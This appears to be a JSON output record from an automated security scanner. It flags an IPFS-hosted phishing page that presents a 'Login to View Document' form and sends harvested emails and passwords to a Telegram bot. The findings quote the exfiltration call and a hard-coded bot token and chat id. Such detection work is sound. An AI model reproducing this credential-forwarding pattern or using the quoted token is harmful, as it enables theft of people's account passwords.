{"root_cid":"bafybeidovbg6xrgggm3zovic4sy3peerrzzoi7otx6mevftc5c6zkicr7a","model":"openai/gpt-5.4-mini","analyzed_at":"2026-05-02T21:31:29.519Z","result":{"schema_version":1,"category":"Identity","category_confidence":0.84,"summary":"A deceptive login form labeled as a document gate that harvests email and password input and sends it to Telegram.","signals":["analysis-context.json: latest_probe.title is \"continue\" and content_type is \"text/html\" for the mounted IPFS root.","root: contains a form with labels 'Email:' and 'Email password:' plus a submit button 'Login to View Document'.","root: inline script reads the hash into the email field and posts 'submission:\\nEmail: ' + email + '\\nPassword: ' + password to a Telegram bot endpoint.","root: fetch(url) targets 'https://api.telegram.org/bot' + apiKey + '/sendMessage' with a hard-coded bot token and chat id."],"quality":{"tier":"low","score":0.2,"is_substantive":true,"is_redirect_only":false,"is_placeholder":false,"rationale":"The page has working form and JavaScript, but it is a thin, deceptive credential-harvesting page with little legitimate user value."},"security":{"risk":"high","risk_score":0.97,"threat_type":"phishing_language","safe_to_list":false,"findings":[{"type":"phishing_language","severity":"high","confidence":0.99,"evidence":"root: 'Login to View Document' asks for 'Email password' and the script sends 'submission:\\nEmail: ' + email + '\\nPassword: ' + password to Telegram.","file":"root"},{"type":"suspicious_external_script","severity":"high","confidence":0.98,"evidence":"root: 'https://api.telegram.org/bot' + apiKey + '/sendMessage' with hard-coded apiKey '8023714792:AAFAPT-fDpe1LNo42sCVie7Tt7H3YUYcc1I' and chatId '6535760971'.","file":"root"}]},"files_reviewed":["analysis-context.json","root"]}}